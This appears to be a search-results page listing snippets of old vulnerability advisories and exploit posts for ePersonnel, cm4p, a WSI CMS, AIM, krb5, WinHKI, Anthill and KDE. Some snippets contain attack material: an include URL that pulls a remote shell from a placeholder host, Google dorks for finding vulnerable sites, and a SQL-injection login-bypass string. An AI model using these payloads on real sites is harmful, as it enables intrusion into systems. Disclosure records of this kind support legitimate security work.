49 matches found
ePersonnel_RC_2004 Remote File Bug
ePersonnelRC200402 Remote File Bug D0rk: N0t D0rk : Bug in : "/protection.php" Vlu Code : include$logoutpage; Exploit : ---------- http://sitename.com/path/protection.php?logoutpage=http://SHELLURL?...
cm4p-rfi.txt
AuThor:Silitoad emA!l:SilitoadathotmaildotCom HoMePaGe: http://www.Arabian-FighterZ.com Info website: http://www.mariovaldez.net cms: cm4p Version: 0.6.1 Download: http://www.mariovaldez.net/software/cm4p/files/cm4p0.6.1.zip Problem: Include file bug: includeonce $pathpre . "cm/cmanon.inc.php";...
wisi-sql.txt
By: Jesus Tovar mail: [email protected] Greetz: Dario Struz Vendor: http://www.wsicorporate.com Digital Security Owner Dork: "Created and maintained by WSI" File Bug: /login.asp /admin/login.asp /admin/request.asp Sql Injection : ' or 'x'='x Site Examples: http://host.com/admin/login.asp...
CVE-2001-1417
CVE-2001-1417 affects AOL Instant Messenger (AIM) 4.7. An attacker can trigger a denial of service by sending a buddy icon GIF where the length/width values exceed the actual image data, causing the application to hang or crash. The available sources (NVD/CVE records) describe the impact as a DoS...
RHEL 2.1 / 3 : krb5 (RHSA-2005:012)
Updated Kerberos krb5 packages that correct buffer overflow and temporary file bugs are now available for Red Hat Enterprise Linux. Kerberos is a networked authentication system that uses a trusted third party a KDC to authenticate clients and servers to each other. A heap based buffer overflow b...
[Full-Disclosure] WinHKI - LHA File Incorrect Filename Handeling Leads to Crash/Underflow
Application: WinHKI Vendors: http://www.webtoolmaster.com Versions: 1.4d Platforms: Windows Bug: LHA File Incorrect Filename Handeling Leads to Crash/Underflow Exploitation: Local extract file Date: 24 Dec 2004 Author: Rafel Ivgi, The-Insider E-Mail: [email protected] Website:...
[Full-Disclosure] WinHKI - LHA File Incorrect Filename Handeling Leads to Crash/Underflow
Application: WinHKI Vendors: http://www.webtoolmaster.com Versions: 1.4d Platforms: Windows Bug: LHA File Incorrect Filename Handeling Leads to Crash/Underflow Exploitation: Local extract file Date: 24 Dec 2004 Author: Rafel Ivgi, The-Insider E-Mail: [email protected] Website:...
CVE-2002-0548
Anthill allows remote attackers to bypass authentication and file bug reports by directly accessing the postbug.php program instead of enterbug.php...
KDE 1.1.2 KApplication configfile - Local Privilege Escalation (2)
source: https://www.securityfocus.com/bid/1291/info The KDE configuration-file management has a bug which could result in root compromise. Due to insecure creation of configuration rc files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root...